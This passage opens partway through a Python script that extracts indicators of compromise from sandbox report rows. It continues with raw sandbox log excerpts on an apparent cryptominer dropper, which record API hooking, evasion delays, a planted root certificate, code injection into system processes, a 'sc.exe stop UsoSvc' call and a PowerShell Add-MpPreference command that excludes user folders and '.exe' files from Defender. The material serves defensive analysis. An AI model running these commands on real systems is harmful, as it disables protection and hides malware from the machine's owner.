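# Hooking sections, including the link residue that the parser must ignore.
SAMPLE_ROWS = [
    "barindex",
    r"Source: C:\Windows\System32\lsass.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob",
    r"Source: C:\Users\user\Desktop\kx new.exeFile created: C:\Users\user\AppData\Local\Temp\xmr new.exeJump to dropped file",
    r"Source: C:\Users\user\AppData\Local\Temp\xmr new.exeFile created: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeJump to dropped file",
    r"Source: C:\Users\user\Desktop\kx new.exeFile created: C:\Users\user\AppData\Local\Temp\Kawpow new.exeJump to dropped file",
    r"Source: C:\Users\user\AppData\Local\Temp\xmr new.exeFile created: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeJump to dropped file",
    r"Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc",
    "Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile",
    "Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey",
    "Source: explorer.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF",
    r"Source: C:\Windows\System32\lsass.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob",
]


def parse_row(line):
    """Return (source, event, detail) for an event row, or None for anything else."""
    match = ROW_RE.match(line.strip())
    if not match:
        return None
    return match.group("source"), match.group("event"), match.group("detail")


def extract_iocs(lines):
    """Group parsed rows into de-duplicated, sorted IOC lists."""
    iocs = {
        "root_cert_thumbprints": set(),
        "dropped_files": set(),
        "process_commands": set(),
        "hooked_functions": set(),
        "sources": set(),
    }
    for line in lines:
        row = parse_row(line)
        if row is None:
            continue
        source, event, detail = row
        iocs["sources"].add(source)
        if event in ("Registry value created", "Key value created or modified"):
            cert = ROOT_CERT_RE.search(detail)
            if cert:
                iocs["root_cert_thumbprints"].add(cert.group(1).upper())
        elif event == "File created":
            iocs["dropped_files"].add(detail)
        elif event == "Process created":
            iocs["process_commands"].add(detail)
        elif event in ("IAT, EAT, inline or SSDT hook detected", "User mode code has changed"):
            func = HOOKED_FUNC_RE.search(detail)
            if func:
                iocs["hooked_functions"].add(func.group(1))
    return {key: sorted(values) for key, values in iocs.items()}


if __name__ == "__main__":
    print(json.dumps(extract_iocs(SAMPLE_ROWS), indent=2))
```

The thumbprint list feeds a check of the machine ROOT store on suspect hosts, the dropped-file list a file-system sweep, and the hooked-function list a memory comparison of ntdll exports against the on-disk copy; the two certificate rows (lsass.exe writing the same Blob under two labels) collapse to a single thumbprint.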

Hooking and other Techniques for Hiding and Protection

Source: explorer.exe | IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
Source: explorer.exe | IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
Source: explorer.exe | IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: explorer.exe | User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
Source: C:\Windows\System32\lsass.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Users\user\Desktop\kx new.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\kx new.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (identical row recorded 106 times in the report)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\dialer.exeCode function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,45_2_00000001400010C0
Source: C:\Windows\System32\dialer.exeCode function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,52_2_00000001400010C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5412
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4320
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8467
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1032
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8532
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 891
Source: C:\Windows\System32\dialer.exeWindow / User API: threadDelayed 1659
Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 4973
Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 5027
Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 8014
Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 1937
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 3272
Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 9871
Source: C:\Windows\System32\lsass.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep graph_73-15397
Source: C:\Windows\System32\wbem\WmiPrvSE.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep graph_10-14922
Source: C:\Windows\System32\dwm.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep graph_75-15105
Source: C:\Windows\System32\svchost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep graph_74-14941
Source: C:\Windows\System32\winlogon.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep graph_59-16956
Source: C:\Windows\System32\dialer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes graph_45-409
Source: C:\Windows\System32\wbem\WmiPrvSE.exeAPI coverage: 4.8 %
Source: C:\Windows\System32\lsass.exeAPI coverage: 6.7 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 5.9 %
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7696Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7936Thread sleep count: 8467 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7940Thread sleep count: 1032 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8004Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7928Thread sleep count: 8532 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7928Thread sleep count: 891 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8008Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\System32\wbem\WmiPrvSE.exe TID: 1984Thread sleep count: 254 > 30
Source: C:\Windows\System32\wbem\WmiPrvSE.exe TID: 1984Thread sleep time: -254000s >= -30000s
Source: C:\Windows\System32\dialer.exe TID: 3552Thread sleep count: 1659 > 30
Source: C:\Windows\System32\dialer.exe TID: 3552Thread sleep time: -165900s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 7816Thread sleep count: 4973 > 30
Source: C:\Windows\System32\winlogon.exe TID: 7816Thread sleep time: -4973000s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 7816Thread sleep count: 5027 > 30
Source: C:\Windows\System32\winlogon.exe TID: 7816Thread sleep time: -5027000s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 7936Thread sleep count: 8014 > 30
Source: C:\Windows\System32\lsass.exe TID: 7936Thread sleep time: -8014000s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 7936Thread sleep count: 1937 > 30
Source: C:\Windows\System32\lsass.exe TID: 7936Thread sleep time: -1937000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7924Thread sleep count: 3272 > 30
Source: C:\Windows\System32\svchost.exe TID: 7924Thread sleep time: -3272000s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 8060Thread sleep count: 9871 > 30
Source: C:\Windows\System32\dwm.exe TID: 8060Thread sleep time: -9871000s >= -30000s
Source: C:\Windows\System32\wbem\WmiPrvSE.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 10_2_000002534CF9DCE0 FindFirstFileExW,10_2_000002534CF9DCE0
Source: C:\Windows\System32\winlogon.exeCode function: 59_2_000002E99175DCE0 FindFirstFileExW,59_2_000002E99175DCE0
Source: C:\Windows\System32\lsass.exeCode function: 73_2_00000213BDCEDCE0 FindFirstFileExW,73_2_00000213BDCEDCE0
Source: C:\Windows\System32\svchost.exeCode function: 74_2_00000158709DDCE0 FindFirstFileExW,74_2_00000158709DDCE0
Source: C:\Windows\System32\dwm.exeCode function: 75_2_0000026DB167DCE0 FindFirstFileExW,75_2_0000026DB167DCE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: kx new.exe, 00000000.00000001.1426821105.0000000000402000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: <)QEmu
Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end nodegraph_45-477
Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end nodegraph_52-395
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 10_2_000002534CF97D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_000002534CF97D90
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 10_2_000002534CF918B4 GetProcessHeap,HeapFree,10_2_000002534CF918B4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\dialer.exeProcess token adjusted: Debug
Source: C:\Windows\System32\dialer.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\kx new.exeCode function: 0_2_004014D1 EntryPoint,memset,SetUnhandledExceptionFilter,__set_app_type,_controlfp,__argc,__argv,_environ,_environ,__argv,__getmainargs,__argc,__argv,_environ,__argc,__argc,exit,0_2_004014D1
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 10_2_000002534CF97D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_000002534CF97D90
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 10_2_000002534CF9D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_000002534CF9D2A4
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 10_2_000002534CFA6218 SetUnhandledExceptionFilter,10_2_000002534CFA6218
Source: C:\Windows\System32\winlogon.exeCode function: 59_2_000002E991766218 SetUnhandledExceptionFilter,59_2_000002E991766218
Source: C:\Windows\System32\winlogon.exeCode function: 59_2_000002E99175D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,59_2_000002E99175D2A4
Source: C:\Windows\System32\winlogon.exeCode function: 59_2_000002E991757D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,59_2_000002E991757D90
Source: C:\Windows\System32\lsass.exeCode function: 73_2_00000213BDCE7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,73_2_00000213BDCE7D90
Source: C:\Windows\System32\lsass.exeCode function: 73_2_00000213BDCED2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,73_2_00000213BDCED2A4
Source: C:\Windows\System32\lsass.exeCode function: 73_2_00000213BDCF6218 SetUnhandledExceptionFilter,73_2_00000213BDCF6218
Source: C:\Windows\System32\svchost.exeCode function: 74_2_00000158709DD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,74_2_00000158709DD2A4
Source: C:\Windows\System32\svchost.exeCode function: 74_2_00000158709E6218 SetUnhandledExceptionFilter,74_2_00000158709E6218
Source: C:\Windows\System32\svchost.exeCode function: 74_2_00000158709D7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,74_2_00000158709D7D90
Source: C:\Windows\System32\dwm.exeCode function: 75_2_0000026DB1686218 SetUnhandledExceptionFilter,75_2_0000026DB1686218
Source: C:\Windows\System32\dwm.exeCode function: 75_2_0000026DB167D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,75_2_0000026DB167D2A4
Source: C:\Windows\System32\dwm.exeCode function: 75_2_0000026DB1677D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,75_2_0000026DB1677D90

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\winlogon.exe base: 2E991720000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\lsass.exe base: 213BDCB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 158709A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\dwm.exe base: 26DB15B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2A3EFFC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2C9AFB80000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2C06F7B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2917C380000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 22382750000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 28A1B1D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1486AD40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 24BD3CA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1FA73D30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1CD021B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 269B9FD0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 22054D80000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 27C57DA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2A333B40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1F174530000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 23315740000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2A9C8540000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1EC212A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1876D540000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 22CD8950000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 15104330000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 22308E70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1AB19360000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1E731800000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1A6DD9B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1E2FA1C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\spoolsv.exe base: D50000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 209D2560000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1FC05190000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2AFD1A00000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1D6B0DA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2036E550000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 150FC6C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2480FAC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2671A930000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2C588F90000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1A8857C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 174DEDC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 282A2110000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1DA09D90000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 287FBEC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\sihost.exe base: 2537C620000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 29B59750000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 20CAB590000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1BBF95A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1D49EEE0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\ctfmon.exe base: 26E2B2E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1B0CC6E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\explorer.exe base: B690000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 23014DD0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 21744F70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1F02ED50000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\dasHost.exe base: 1B2E6AF0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 25A84C20000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 194A0780000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2AD4DDB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\dllhost.exe base: 1C0F4C90000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1F3A5110000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\smartscreen.exe base: 2164ACF0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 19985DA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 26D10760000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 23F7CDE0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2EE94180000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 23954370000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DC60940000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\conhost.exe base: 2458CF00000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1B2DA190000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2B53A000000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 26C4DB20000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1FAB9BD0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1278E940000 protect: page execute and read and write
